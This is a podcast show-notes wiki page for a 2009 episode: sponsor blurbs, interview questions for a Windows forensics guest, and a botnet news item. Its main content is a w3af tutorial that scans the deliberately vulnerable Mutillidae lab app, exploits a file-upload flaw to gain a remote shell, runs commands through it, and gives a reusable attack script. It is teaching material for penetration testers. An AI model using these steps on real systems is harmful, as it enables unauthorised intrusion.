Episode151

From Paul's Security Weekly
Jump to: navigation, search
Palo Alto Networks
Tenable Network Security
The SANS Institute
Pwnie Express
Black Hills Information Security
BlackSquirrel
Onapsis

SANS Las Vegas from October 26-27th will debut a new course titled "Embedded Device Security Assessments for the Rest of Us" which will teach students how to assess embedded systems of all varieties on pen tests and in your duties as a security professional. Register Here


Sponsors

  • Tenable Network Security - This episode sponsored by Tenable network security. Tenable is a developer of enterprise vulnerability, compliance and log management software, but most notably the creators of Nessus, the worlds best vulnerability scanner. Tenable Security Center software extends the power of Nessus through reporting, remediation workflow, IDS event correlation and much more. Tenable also offers a Nessus Professional Feed to detect vulnerabilities in your network today! Tenable – Unified Security Monitoring!
  • Core Security - This episode is also sponsored by Core Security Technologies, helping you penetrate your network. Now version 10.0 with WiFi-fu good to go! Rock out with your 'sploit out! Listen to this podcast and qualify to receive a 10% discount on Core Impact, the worlds best penetration testing tool.
  • Trustwave Spiderlabs - Trustwave's SpiderLabs - providing advanced information security services to planet Earth. Visit them online at trustwave.com/spiderlabs!

Announcements & Shameless Plugs

Security Weekly - Episode 151 - May 7, 2009

  • SANS@Home/Community - SEC517 Cutting-Edge Hacking Techniques - May 11 & 13th 7-10PM use the discount code "Security Weekly" for a 10% savings - Click here to register now! - NOTE: Due to logistical issues, this event will only be done remotely.
  • 2009 South Florida ISSA Conference and Exhibition - June 24th Learn more!
  • SANS Security Europe: 504 in Amsterdam with Larry. May 18th-23rd
  • SANS Pentest Summit! Vegas Baby! Paul, Larry, John presenting. June 1st - 2nd

Episode Media

mp3

Special Guest: Harlan Carvey

Harlan Carvey (CISSP), author of the acclaimed Windows Forensics and Incident Recovery, is a computer forensics and incident response consultant based out of the Northern VA/Metro DC area.

He currently provides emergency incident response and computer forensic analysis services to clients throughout the U.S. His specialties include focusing specifically on the Windows 2000 and later platforms with regard to incident response, Registry and memory analysis, and post-mortem computer forensic analysis.

Harlan's background includes positions as a consultant performing vulnerability assessments and penetration tests and as a full-time security engineer. He also has supported federal government agencies with incident response and computer forensic services.

Harlan holds a bachelor's degree in electrical engineering from the Virginia Military Institute and a master's degree in electrical engineering from the Naval Postgraduate School.

Questions:

  1. How did you get started in infosec?
  2. Windows forensics is a huge field, how does someone get started?
  3. What are your thoughts on Helix going commercial?
  4. What are some of your favorite tools? Commercial and Free?
  5. Some of your favorite cases (we want the juicy ones, of course)?
  6. What are some of the more clever hacks you have seen for recovering information (and constructing a timeline) that you have seen? Registry? IE History? Restore points?
  7. I'm seeing a trend in delving deeper and deeper into a system to gather information. Is this because folks are getting smarter, better at hiding their tracks, or because windows is getting better?
  8. How much of the more advanced analysis is making it to court cases, or is often the basic analysis enough?
  9. How does one get into authoring? Is this something you would recommend for others?
  10. What are some of the more common mistakes you see folks making?
  11. If you could wave a magic wand, what would you change about the Windows OS to make forensics easier/more effective?
  12. What're the security things that keep you up at night?
  13. Who is Captain Forensics?

Tech Segment: w3af FTW with Seth Misenar

In episode 144, I gave a technical segment that provided a broad overview of the functionality provided by w3af. In this episode, I hope to illustrate some techniques you can use to break into some web apps.

The Setup

  • OWASP Live CD within VM as the attack platform (another alternative would be SamuraiWTF).
  • Leveraging Mutillidae (thx Irongeek) on Windows platform for the target: (http://192.168.117.1/mutillidea/)
  • Added "functionality" to Mutillidae, including additional vulnerable PHP application (http://192.168.117.1/mutillidae/audits) - (Thanks Andres for the code/suggestion)

The Process

The goal was to show how we can use w3af to discover a web application vulnerabilities and exploit them. Web Application assessments are more of an art rather than science, even with the burgeoning tools that are available. It is never a good idea to enable all of the scanning/attacking options and set the tool loose. This is especially true with w3af's Discovery plugins. Let's see if we can collect information about the architecture of our target (192.168.117.1):

# nmap -O -sC -sV -p80 192.168.117.1

The results show the operating system to be Windows running an Apache web server leveraging a PHP framework. This information will be added to the context of our scan. As stated in the previous podcast (144), there are two primary methods of configuring/running scans: the GUI and the console. We explore each in the videos associated with this tech segment and will discuss them here.

Console

The help command provides a context sensitive heads-up help menu:

w3af>>> help
|-----------------------------------------------------------------------------|
| start         | Start the scan.                                             |
| plugins       | Enable and configure plugins.                               |
| exploit       | Exploit the vulnerability.                                  |
| profiles      | List and use scan profiles.                                 |
|-----------------------------------------------------------------------------|
| http-settings | Configure the HTTP settings of the framework.               |
| misc-settings | Configure w3af misc settings.                               |
| target        | Configure the target URL.                                   |
|-----------------------------------------------------------------------------|
| back          | Go to the previous menu.                                    |
| exit          | Exit w3af.                                                  |
| assert        | Check assertion.                                            |
|-----------------------------------------------------------------------------|
| help          | Display help. Issuing: help [command] , prints more         |
|               | specific help about "command"                               |
| version       | Show w3af version information.                              |
| keys          | Display key shortcuts.                                      |
|-----------------------------------------------------------------------------|
w3af>>>

The target command will take us into the w3af console:

w3af>>> target
w3af/config:target>>> view
|----------------------------------------------------------------------------|
| Setting         | Value   | Description                                    |
|----------------------------------------------------------------------------|
| targetOS        | unknown | Target operating system (unknown/unix/windows) |
| targetFramework | unknown | Target programming framework                   |
|                 |         | (unknown/php/asp/asp.net/java/jsp/cfm/ruby/perl) |

| target          |         | A comma separated list of URLs                 |
|----------------------------------------------------------------------------|
w3af/config:target>>>

Let's set our configuration options for our target:

w3af/config:target>>> set targetOS windows
w3af/config:target>>> set targetFramework php
w3af/config:target>>> set target http://localhost/mutillidae/audit/file_upload/

Now we can see that our target settings took.

w3af/config:target>>> view
|-----------------------------------------------------------------------------|
| Setting | Value                   | Description                             |
|-----------------------------------------------------------------------------|
| targetOS | windows                 | Target operating system                |
|         |                         | (unknown/unix/windows)                  |
| targetFramework | php                     | Target programming framework    |
|         |                         | (unknown/php/asp/asp.net/java/jsp/cfm/ruby
/perl) |
| target  | http://localhost/mutillidae/audit/file_upload/ | A comma separated l
ist of URLs          |
|-----------------------------------------------------------------------------|
w3af/config:target>>>

Now we jump back to the main console, and then move into the plugins section. The plugins command will take us into the section of the w3af console that allows us to configure our plugins.

w3af/config:target>>> back
w3af>>> plugins

Let's view the various plugins available

w3af/plugins>>> help
|-----------------------------------------------------------------------------|
| list          | List available plugins.                                     |
|-----------------------------------------------------------------------------|
| back          | Go to the previous menu.                                    |
| exit          | Exit w3af.                                                  |
| assert        | Check assertion.                                            |
|-----------------------------------------------------------------------------|
| audit         | View, configure and enable audit plugins                    |
| bruteforce    | View, configure and enable bruteforce plugins               |
| discovery     | View, configure and enable discovery plugins                |
| evasion       | View, configure and enable evasion plugins                  |
| grep          | View, configure and enable grep plugins                     |
| mangle        | View, configure and enable mangle plugins                   |
| output        | View, configure and enable output plugins                   |
|-----------------------------------------------------------------------------|
w3af/plugins>>>

The audit command will show us the current audit plugin configuration.

w3af/plugins>>> audit
|----------------------------------------------------------------------------|
| Plugin name       | Status | Conf | Description                            |
|----------------------------------------------------------------------------|
| LDAPi             |        |      | Find LDAP injection bugs.              |
| blindSqli         |        | Yes  | Find blind SQL injection               |
|                   |        |      | vulnerabilities.                       |
| buffOverflow      |        |      | Find buffer overflow vulnerabilities.  |
| dav               |        |      | Verify if the WebDAV module is         |
|                   |        |      | properly configured.                   |
| eval              |        | Yes  | Find insecure eval() usage.            |
| fileUpload        |        | Yes  | Uploads a file and then searches for   |
|                   |        |      | the file inside all known directories. |
| formatString      |        |      | Find format string vulnerabilities.    |
| frontpage         |        | Yes  | Tries to upload a file using frontpage |
|                   |        |      | extensions (author.dll).               |
| generic           |        | Yes  | Find all kind of bugs without using a  |
|                   |        |      | fixed database of errors.              |
| globalRedirect    |        |      | Find scripts that redirect the browser |
|                   |        |      | to any site.                           |
| htaccessMethods   |        |      | Find misconfigurations in the          |
|                   |        |      | "<LIMIT>" configuration of Apache.     |
| localFileInclude  |        |      | Find local file inclusion              |
|                   |        |      | vulnerabilities.                       |
| mxInjection       |        |      | Find MX injection vulnerabilities.     |
| osCommanding      |        |      | Find OS Commanding vulnerabilities.    |
| phishingVector    |        |      | Find phishing vectors.                 |
| preg_replace      |        |      | Find unsafe usage of PHPs              |
|                   |        |      | preg_replace.                          |
| remoteFileInclude |        | Yes  | Find remote file inclusion             |
|                   |        |      | vulnerabilities.                       |
| responseSplitting |        |      | Find response splitting                |
|                   |        |      | vulnerabilities.                       |
| sqli              |        |      | Find SQL injection bugs.               |
| ssi               |        |      | Find server side inclusion             |
|                   |        |      | vulnerabilities.                       |
| sslCertificate    |        |      | Check the SSL certificate validity( if |
|                   |        |      | https is being used ).                 |
| unSSL             |        |      | Find out if secure content can also be |
|                   |        |      | fetched using http.                    |
| xpath             |        |      | Find XPATH injection vulnerabilities.  |
| xsrf              |        |      | Find the easiest to exploit xsrf       |
|                   |        |      | vulnerabilities.                       |
| xss               |        | Yes  | Find cross site scripting              |
|                   |        |      | vulnerabilities.                       |
| xst               |        |      | Find Cross Site Tracing                |
|                   |        |      | vulnerabilities.                       |
|----------------------------------------------------------------------------|
w3af/plugins>>>

Now, we enable the fileUpload audit plugin with the following command, and then confirm the configuration.

w3af/plugins>>> audit fileUpload
w3af/plugins>>> audit
|----------------------------------------------------------------------------|
| Plugin name       | Status  | Conf | Description                           |
|----------------------------------------------------------------------------|
| LDAPi             |         |      | Find LDAP injection bugs.             |
| blindSqli         |         | Yes  | Find blind SQL injection              |
|                   |         |      | vulnerabilities.                      |
| buffOverflow      |         |      | Find buffer overflow vulnerabilities. |
| dav               |         |      | Verify if the WebDAV module is        |
|                   |         |      | properly configured.                  |
| eval              |         | Yes  | Find insecure eval() usage.           |
| fileUpload        | Enabled | Yes  | Uploads a file and then searches for  |
|                   |         |      | the file inside all known             |
|                   |         |      | directories.                          |
| formatString      |         |      | Find format string vulnerabilities.   |
| frontpage         |         | Yes  | Tries to upload a file using          |
|                   |         |      | frontpage extensions (author.dll).    |
| generic           |         | Yes  | Find all kind of bugs without using a |
|                   |         |      | fixed database of errors.             |
| globalRedirect    |         |      | Find scripts that redirect the        |
|                   |         |      | browser to any site.                  |
| htaccessMethods   |         |      | Find misconfigurations in the         |
|                   |         |      | "<LIMIT>" configuration of Apache.    |
| localFileInclude  |         |      | Find local file inclusion             |
|                   |         |      | vulnerabilities.                      |
| mxInjection       |         |      | Find MX injection vulnerabilities.    |
| osCommanding      |         |      | Find OS Commanding vulnerabilities.   |
| phishingVector    |         |      | Find phishing vectors.                |
| preg_replace      |         |      | Find unsafe usage of PHPs             |
|                   |         |      | preg_replace.                         |
| remoteFileInclude |         | Yes  | Find remote file inclusion            |
|                   |         |      | vulnerabilities.                      |
| responseSplitting |         |      | Find response splitting               |
|                   |         |      | vulnerabilities.                      |
| sqli              |         |      | Find SQL injection bugs.              |
| ssi               |         |      | Find server side inclusion            |
|                   |         |      | vulnerabilities.                      |
| sslCertificate    |         |      | Check the SSL certificate validity(   |
|                   |         |      | if https is being used ).             |
| unSSL             |         |      | Find out if secure content can also   |
|                   |         |      | be fetched using http.                |
| xpath             |         |      | Find XPATH injection vulnerabilities. |
| xsrf              |         |      | Find the easiest to exploit xsrf      |
|                   |         |      | vulnerabilities.                      |
| xss               |         | Yes  | Find cross site scripting             |
|                   |         |      | vulnerabilities.                      |
| xst               |         |      | Find Cross Site Tracing               |
|                   |         |      | vulnerabilities.                      |
|----------------------------------------------------------------------------|
w3af/plugins>>>

The discovery command shows the current discovery plugin configuration.

w3af/plugins>>> discovery
|---------------------------------------------------------------------------|
| Plugin name            | Status | Conf | Description                      |
|---------------------------------------------------------------------------|
| MSNSpider              |        | Yes  | Search MSN to get a list of new  |
|                        |        |      | URLs                             |
| afd                    |        |      | Find out if the remote web       |
|                        |        |      | server has an active filter (    |
|                        |        |      | IPS or WAF ).                    |
| allowedMethods         |        | Yes  | Enumerate the allowed methods of |
|                        |        |      | an URL.                          |
| archiveDotOrg          |        | Yes  | Search archive.org to find new   |
|                        |        |      | pages in the target site.        |
| crossDomain            |        |      | Analyze the crossdomain.xml      |
|                        |        |      | file.                            |
| detectReverseProxy     |        |      | Find out if the remote web       |
|                        |        |      | server has a reverse proxy.      |
| detectTransparentProxy |        |      | Find out if your ISP has a       |
|                        |        |      | transparent proxy installed.     |
| digitSum               |        | Yes  | Take an URL with a number (      |
|                        |        |      | index2.asp ) and try to find     |
|                        |        |      | related files (index1.asp,       |
|                        |        |      | index3.asp).                     |
| dnsWildcard            |        |      | Find out if www.site.com and     |
|                        |        |      | site.com return the same page.   |
| domain_dot             |        |      | Send a specially crafted request |
|                        |        |      | with a dot after the domain      |
|                        |        |      | (http://host.tld./) and analyze  |
|                        |        |      | response.                        |
| dotNetErrors           |        |      | Request specially crafted URLs   |
|                        |        |      | that generate ASP.NET errors in  |
|                        |        |      | order to gather information.     |
| findBackdoor           |        |      | Find web backdoors and web       |
|                        |        |      | shells.                          |
| findCaptchas           |        |      | Identify captcha images on web   |
|                        |        |      | pages.                           |
| findvhost              |        |      | Modify the HTTP Host header and  |
|                        |        |      | try to find virtual hosts.       |
| fingerGoogle           |        | Yes  | Search Google using the Google   |
|                        |        |      | API to get a list of users for a |
|                        |        |      | domain.                          |
| fingerMSN              |        | Yes  | Search MSN to get a list of      |
|                        |        |      | users for a domain.              |
| fingerPKS              |        |      | Search MIT PKS to get a list of  |
|                        |        |      | users for a domain.              |
| fingerprint_WAF        |        |      | Identify if a Web Application    |
|                        |        |      | Firewall is present and if       |
|                        |        |      | possible identify the vendor and |
|                        |        |      | version.                         |
| fingerprint_os         |        |      | Fingerprint the remote operating |
|                        |        |      | system using the HTTP protocol.  |
| frontpage_version      |        |      | Search FrontPage Server Info     |
|                        |        |      | file and if it finds it will     |
|                        |        |      | determine its version.           |
| ghdb                   |        | Yes  | Search Google for                |
|                        |        |      | vulnerabilities in the target    |
|                        |        |      | site.                            |
| googleSets             |        | Yes  | Use Google sets to get related   |
|                        |        |      | words from an URI and test them  |
|                        |        |      | to find new URLs.                |
| googleSpider           |        | Yes  | Search google using google API   |
|                        |        |      | to get new URLs                  |
| halberd                |        |      | Identify if the remote server    |
|                        |        |      | has HTTP load balancers.         |
| hmap                   |        | Yes  | Fingerprint the server type, i.e |
|                        |        |      | apache, iis, tomcat, etc.        |
| importResults          |        | Yes  | Import URLs found by other       |
|                        |        |      | tools.                           |
| oracleDiscovery        |        |      | Find Oracle applications on the  |
|                        |        |      | remote web server.               |
| phishtank              |        | Yes  | Search the phishtank.com         |
|                        |        |      | database to determine if your    |
|                        |        |      | server is (or was) being used in |
|                        |        |      | phishing scams.                  |
| phpEggs                |        |      | Fingerprint the PHP version      |
|                        |        |      | using documented easter eggs     |
|                        |        |      | that exist in PHP.               |
| phpinfo                |        |      | Search PHP Info file and if it   |
|                        |        |      | finds it will determine the      |
|                        |        |      | version of PHP.                  |
| pykto                  |        | Yes  | A nikto port to python.          |
| robotsReader           |        |      | Analyze the robots.txt file and  |
|                        |        |      | find new URLs                    |
| serverHeader           |        | Yes  | Identify the server type based   |
|                        |        |      | on the server header.            |
| serverStatus           |        |      | Find new URLs from the Apache    |
|                        |        |      | server-status cgi.               |
| sharedHosting          |        | Yes  | Use MSN search to determine if   |
|                        |        |      | the website is in a shared       |
|                        |        |      | hosting.                         |
| sitemapReader          |        |      | Analyze the sitemap.xml file and |
|                        |        |      | find new URLs                    |
| slash                  |        |      | Identify if the resource         |
|                        |        |      | http://host.tld/spam/ and        |
|                        |        |      | http://host.tld/spam are the     |
|                        |        |      | same.                            |
| spiderMan              |        | Yes  | SpiderMan is a local proxy that  |
|                        |        |      | will collect new URLs.           |
| urlFuzzer              |        | Yes  | Try to find backups, and other   |
|                        |        |      | related files.                   |
| userDir                |        | Yes  | Try to find user directories     |
|                        |        |      | like "http://test/~user/" and    |
|                        |        |      | identify the remote OS based on  |
|                        |        |      | the remote users.                |
| webDiff                |        | Yes  | Compare a local directory with a |
|                        |        |      | remote URL path.                 |
| webSpider              |        | Yes  | Crawl the whole site to find new |
|                        |        |      | URLs                             |
| wordnet                |        | Yes  | Use the wordnet lexical database |
|                        |        |      | to find new URLs.                |
| wsdlFinder             |        |      | Find web service definitions     |
|                        |        |      | files.                           |
| yahooSiteExplorer      |        | Yes  | Search Yahoo's index using Yahoo |
|                        |        |      | site explorer to get a list of   |
|                        |        |      | URLs                             |
| zone_h                 |        |      | Find out if the site was defaced |
|                        |        |      | in the past.                     |
|---------------------------------------------------------------------------|
w3af/plugins>>> 

This enables the webSpider discovery plugin.

w3af/plugins>>> discovery webSpider

As we saw above when just running discovery, there are configurable options for the webSpider discovery plugin. This command allows us to set the configurable options for the webSpider discovery plugin.

w3af/plugins>>> discovery config webSpider
w3af/plugins/discovery/config:webSpider>>>

Here we can see what options are available for configuration.

w3af/plugins/discovery/config:webSpider>>> view
|-----------------------------------------------------------------------------|
| Setting      | Value | Description                                          |
|-----------------------------------------------------------------------------|
| urlParameter |       | Append the given parameter to new URLs found by the  |
|              |       | spider. Example:                                     |
|              |       | http://www.foobar.com/index.jsp;<parameter>?id=2     |
| followRegex  | .*    | When spidering, only follow links that match this    |
|              |       | regular expression (ignoreRegex has precedence over  |
|              |       | followRegex)                                         |
| ignoreRegex  | None  | When spidering, DO NOT follow links that match this  |
|              |       | regular expression (has precedence over followRegex) |
| onlyForward  | False | When spidering, only search directories inside the   |
|              |       | one that was given as target                         |
|-----------------------------------------------------------------------------|
w3af/plugins/discovery/config:webSpider>>>

Now we set the onlyForward option to True which will allow us to not go any higher than the directory we are in. After setting the option we confirm the setting.

w3af/plugins/discovery/config:webSpider>>> set onlyForward True
w3af/plugins/discovery/config:webSpider>>> view
|-----------------------------------------------------------------------------|
| Setting      | Value | Description                                          |
|-----------------------------------------------------------------------------|
| urlParameter |       | Append the given parameter to new URLs found by the  |
|              |       | spider. Example:                                     |
|              |       | http://www.foobar.com/index.jsp;<parameter>?id=2     |
| followRegex  | .*    | When spidering, only follow links that match this    |
|              |       | regular expression (ignoreRegex has precedence over  |
|              |       | followRegex)                                         |
| ignoreRegex  | None  | When spidering, DO NOT follow links that match this  |
|              |       | regular expression (has precedence over followRegex) |
| onlyForward  | True  | When spidering, only search directories inside the   |
|              |       | one that was given as target                         |
|-----------------------------------------------------------------------------|
w3af/plugins/discovery/config:webSpider>>>

Now we back out of the webSpider config view and confirm our discovery settings.

w3af/plugins/discovery/config:webSpider>>> back
w3af/plugins>>> discovery
|----------------------------------------------------------------------------|
| Plugin name            | Status  | Conf | Description                      |
|----------------------------------------------------------------------------|
| MSNSpider              |         | Yes  | Search MSN to get a list of new  |
|                        |         |      | URLs                             |
| afd                    |         |      | Find out if the remote web       |
|                        |         |      | server has an active filter (    |
|                        |         |      | IPS or WAF ).                    |
| allowedMethods         |         | Yes  | Enumerate the allowed methods of |
|                        |         |      | an URL.                          |
| archiveDotOrg          |         | Yes  | Search archive.org to find new   |
|                        |         |      | pages in the target site.        |
| crossDomain            |         |      | Analyze the crossdomain.xml      |
|                        |         |      | file.                            |
| detectReverseProxy     |         |      | Find out if the remote web       |
|                        |         |      | server has a reverse proxy.      |
| detectTransparentProxy |         |      | Find out if your ISP has a       |
|                        |         |      | transparent proxy installed.     |
| digitSum               |         | Yes  | Take an URL with a number (      |
|                        |         |      | index2.asp ) and try to find     |
|                        |         |      | related files (index1.asp,       |
|                        |         |      | index3.asp).                     |
| dnsWildcard            |         |      | Find out if www.site.com and     |
|                        |         |      | site.com return the same page.   |
| domain_dot             |         |      | Send a specially crafted request |
|                        |         |      | with a dot after the domain      |
|                        |         |      | (http://host.tld./) and analyze  |
|                        |         |      | response.                        |
| dotNetErrors           |         |      | Request specially crafted URLs   |
|                        |         |      | that generate ASP.NET errors in  |
|                        |         |      | order to gather information.     |
| findBackdoor           |         |      | Find web backdoors and web       |
|                        |         |      | shells.                          |
| findCaptchas           |         |      | Identify captcha images on web   |
|                        |         |      | pages.                           |
| findvhost              |         |      | Modify the HTTP Host header and  |
|                        |         |      | try to find virtual hosts.       |
| fingerGoogle           |         | Yes  | Search Google using the Google   |
|                        |         |      | API to get a list of users for a |
|                        |         |      | domain.                          |
| fingerMSN              |         | Yes  | Search MSN to get a list of      |
|                        |         |      | users for a domain.              |
| fingerPKS              |         |      | Search MIT PKS to get a list of  |
|                        |         |      | users for a domain.              |
| fingerprint_WAF        |         |      | Identify if a Web Application    |
|                        |         |      | Firewall is present and if       |
|                        |         |      | possible identify the vendor and |
|                        |         |      | version.                         |
| fingerprint_os         |         |      | Fingerprint the remote operating |
|                        |         |      | system using the HTTP protocol.  |
| frontpage_version      |         |      | Search FrontPage Server Info     |
|                        |         |      | file and if it finds it will     |
|                        |         |      | determine its version.           |
| ghdb                   |         | Yes  | Search Google for                |
|                        |         |      | vulnerabilities in the target    |
|                        |         |      | site.                            |
| googleSets             |         | Yes  | Use Google sets to get related   |
|                        |         |      | words from an URI and test them  |
|                        |         |      | to find new URLs.                |
| googleSpider           |         | Yes  | Search google using google API   |
|                        |         |      | to get new URLs                  |
| halberd                |         |      | Identify if the remote server    |
|                        |         |      | has HTTP load balancers.         |
| hmap                   |         | Yes  | Fingerprint the server type, i.e |
|                        |         |      | apache, iis, tomcat, etc.        |
| importResults          |         | Yes  | Import URLs found by other       |
|                        |         |      | tools.                           |
| oracleDiscovery        |         |      | Find Oracle applications on the  |
|                        |         |      | remote web server.               |
| phishtank              |         | Yes  | Search the phishtank.com         |
|                        |         |      | database to determine if your    |
|                        |         |      | server is (or was) being used in |
|                        |         |      | phishing scams.                  |
| phpEggs                |         |      | Fingerprint the PHP version      |
|                        |         |      | using documented easter eggs     |
|                        |         |      | that exist in PHP.               |
| phpinfo                |         |      | Search PHP Info file and if it   |
|                        |         |      | finds it will determine the      |
|                        |         |      | version of PHP.                  |
| pykto                  |         | Yes  | A nikto port to python.          |
| robotsReader           |         |      | Analyze the robots.txt file and  |
|                        |         |      | find new URLs                    |
| serverHeader           |         | Yes  | Identify the server type based   |
|                        |         |      | on the server header.            |
| serverStatus           |         |      | Find new URLs from the Apache    |
|                        |         |      | server-status cgi.               |
| sharedHosting          |         | Yes  | Use MSN search to determine if   |
|                        |         |      | the website is in a shared       |
|                        |         |      | hosting.                         |
| sitemapReader          |         |      | Analyze the sitemap.xml file and |
|                        |         |      | find new URLs                    |
| slash                  |         |      | Identify if the resource         |
|                        |         |      | http://host.tld/spam/ and        |
|                        |         |      | http://host.tld/spam are the     |
|                        |         |      | same.                            |
| spiderMan              |         | Yes  | SpiderMan is a local proxy that  |
|                        |         |      | will collect new URLs.           |
| urlFuzzer              |         | Yes  | Try to find backups, and other   |
|                        |         |      | related files.                   |
| userDir                |         | Yes  | Try to find user directories     |
|                        |         |      | like "http://test/~user/" and    |
|                        |         |      | identify the remote OS based on  |
|                        |         |      | the remote users.                |
| webDiff                |         | Yes  | Compare a local directory with a |
|                        |         |      | remote URL path.                 |
| webSpider              | Enabled | Yes  | Crawl the whole site to find new |
|                        |         |      | URLs                             |
| wordnet                |         | Yes  | Use the wordnet lexical database |
|                        |         |      | to find new URLs.                |
| wsdlFinder             |         |      | Find web service definitions     |
|                        |         |      | files.                           |
| yahooSiteExplorer      |         | Yes  | Search Yahoo's index using Yahoo |
|                        |         |      | site explorer to get a list of   |
|                        |         |      | URLs                             |
| zone_h                 |         |      | Find out if the site was defaced |
|                        |         |      | in the past.                     |
|----------------------------------------------------------------------------|
w3af/plugins>>>

Next we want to set how w3af is going to output the results. We jump into the output plugin, see what the options are, and then set and configure them.

w3af/plugins>>> output
|----------------------------------------------------------------------------|
| Plugin    | Status  | Conf | Description                                   |
| name      |         |      |                                               |
|----------------------------------------------------------------------------|
| console   |         | Yes  | Print messages to the console.                |
| gtkOutput |         |      | Saves messages to kb.kb.getData('gtkOutput',  |
|           |         |      | 'queue'), messages are saved in the form of   |
|           |         |      | objects.                                      |
| htmlFile  |         | Yes  | Print all messages to a HTML file.            |
| textFile  |         | Yes  | Prints all messages to a text file.           |
| xmlFile   |         | Yes  | Print all messages to a xml file.             |
|----------------------------------------------------------------------------|
w3af/plugins>>> output console, htmlFile
w3af/plugins>>> output config htmlFile
w3af/plugins/output/config:htmlFile>>> view
|-----------------------------------------------------------------------------|
| Setting  | Value       | Description                                        |
|-----------------------------------------------------------------------------|
| verbose  | False       | True if debug information will be appended to the  |
|          |             | report.                                            |
| fileName | report.html | File name where this plugin will write to          |
|-----------------------------------------------------------------------------|
w3af/plugins/output/config:htmlFile>>> set fileName w3af-report.html
w3af/plugins/output/config:htmlFile>>> view
|----------------------------------------------------------------------------|
| Setting  | Value            | Description                                  |
|----------------------------------------------------------------------------|
| verbose  | False            | True if debug information will be appended   |
|          |                  | to the report.                               |
| fileName | w3af-report.html | File name where this plugin will write to    |
|----------------------------------------------------------------------------|
w3af/plugins/output/config:htmlFile>>>back
w3af/plugins>>> output
|----------------------------------------------------------------------------|
| Plugin    | Status  | Conf | Description                                   |
| name      |         |      |                                               |
|----------------------------------------------------------------------------|
| console   | Enabled | Yes  | Print messages to the console.                |
| gtkOutput |         |      | Saves messages to kb.kb.getData('gtkOutput',  |
|           |         |      | 'queue'), messages are saved in the form of   |
|           |         |      | objects.                                      |
| htmlFile  | Enabled | Yes  | Print all messages to a HTML file.            |
| textFile  |         | Yes  | Prints all messages to a text file.           |
| xmlFile   |         | Yes  | Print all messages to a xml file.             |
|----------------------------------------------------------------------------|
w3af/plugins>>> 

Now we have finished with the plugin configuration and need to jump back to the main w3af console section.

w3af/plugins>>> back

Finally, we are now ready to kick off the w3af scan with the start command. Just as with the GUI, this will scan moving from discovery to audit. Let's see what this looks like.

w3af>>> start
New URL found by webSpider plugin: http://192.168.117.1/mutillidae/audit/file_upload/uploader.php
Found 2 URLs and 3 different points of injection.
The list of URLs is:
- http://192.168.117.1/mutillidae/audit/file_upload/
- http://192.168.117.1/mutillidae/audit/file_upload/uploader.php
The list of fuzzable requests is:
- http://192.168.117.1/mutillidae/audit/file_upload/ | Method: GET
- http://192.168.117.1/mutillidae/audit/file_upload/uploader.php | Method: GET
- http://192.168.117.1/mutillidae/audit/file_upload/uploader.php | Method: POST | Parameters: (MAX_FILE_SIZE="100000", uploadedfile="")
Starting fileUpload plugin execution.
A file upload to a directory inside the webroot was found at: "http://192.168.117.1/mutillidae/audit/file_upload/uploader.php", using HTTP method POST. The sent post-data was: "MAX_FILE_SIZE=100000&uploadedfile=<file_object>". The modified parameter was "uploadedfile". This vulnerability was found in the requests with ids 15 and 22.
Finished scanning process.
w3af>>> 

Now that we have found a vulnerability in the application, as indicated by the last line of the scan output above, we can move into the exploit phase. Here we get to use the happy little command exploit.

w3af>>> exploit

We see the possible exploit plugins by running the list command.

w3af/exploit>>> list
|-----------------------------------------------------------------------------|
| Plugin                 | Description                                        |
|-----------------------------------------------------------------------------|
| sqlmap                 | Exploits [blind] sql injections using sqlmap (     |
|                        | http://sqlmap.sf.net ).                            |
| osCommandingShell      | Exploit OS Commanding vulnerabilities.             |
| xssBeef                | Exploit XSS vulnerabilities using beEF (           |
|                        | www.bindshell.net/tools/beef/ ) .                  |
| localFileReader        | Exploit local file inclusion bugs.                 |
| rfiProxy               | Exploits remote file inclusions to create a proxy  |
|                        | server.                                            |
| remoteFileIncludeShell | Exploit remote file include vulnerabilities.       |
| davShell               | Exploit web servers that have unauthenticated DAV  |
|                        | access.                                            |
| eval                   | Exploit eval() vulnerabilities.                    |
| fileUploadShell        | Exploit applications that allow unrestricted file  |
|                        | uploads inside the webroot.                        |
| sql_webshell           | Exploits [blind] sql injections by uploading a     |
|                        | webshell to the target webroot.                    |
|-----------------------------------------------------------------------------|
w3af/exploit>>>

Since we only audited the application for file upload vulnerabilities, it is pretty obvious that we select the fileUploadShell option.

w3af/exploit>>> exploit fileUploadShell
fileUploadShell exploit plugin is starting.
Vulnerability successfully exploited. This is a list of available shells and proxies:
- [0] <fileUploadShell object (ruser: "contextsecurity\\seth" | rsystem: "CONTEXTSECURITY - Windows_NT - x86 Family 6 Model 15 Stepping 13, GenuineIntel")>
Please use the interact command to interact with the shell objects.

The phpshell has now been pushed to the target and instantiated. As indicated by the last line of output above, we connect to it with the interact <session number> command. Our prompt changes to indicate that we are indeed running in an exploit shell. However, we can run our little shell commands on the target host. We get back to w3af by running the endInteraction command.

w3af/exploit>>> interact 0
Execute "endInteraction" to get out of the remote shell. Commands typed in this menu will be runned through the fileUploadShell shell
w3af/exploit/fileUploadShell-0>>> hostname
contextsecurity

w3af/exploit/fileUploadShell-0>>> echo %username%
seth

w3af/exploit/fileUploadShell-0>>> endInteraction
w3af/exploit>>>

Script Magic

Talking through the above console interaction might have felt like it took a really long time, but in fact it is pretty quick, and easy, once you remember the places that are in need of configuration. However, a very nice feature of w3af is the ability to create scripts of scans that you plan to run frequently. Creating w3af scripts is as easy as running a scan from the console, because, in effect, you simply put each command as you would type it in the console on a separate line.

target
set targetOS windows
set targetFramework php
set target http://192.168.117.1/mutillidae/audit/file_upload/
back
plugins
audit fileUpload
discovery webSpider
discovery config webSpider
set onlyForward True
back
output console, htmlFile
output config htmlFile w3af-report.html
back
back
start
exploit
exploit fileUploadShell
interact 0
hostname
dir
endInteraction

For instance we could save the above set of commands as a script called fileupload.w3af. Assuming that name (and a path of ~/.w3af/scripts/) we could run the scripted version with the following command:


w3af_console -s  ~/.w3af/scripts/fileupload.w3af

References

w3af videos: Though I enjoyed making my w3af video, I would be remiss not to mention the videos available here: http://w3af.sourceforge.net/videos/video-demos.php Mutillidae: Thanks again to Irongeek! Check out Mutillidae at http://www.irongeek.com/i.php?page=security/mutillidae-deliberately-vulnerable-php-owasp-top-10

Stories For Discussion

  1. Snagging 56,000 Passwords? Easy! - [Mick] - Why go through all the trouble of making your own botnet when you can just snag an existing one? Researchers "stole" a botnet and were able to learn some interesting things. 56K passwords for an hour's work? Sign me up! Ethical question: can you claim to be white hat after doing something like this? IMO this is a path of the dark side.
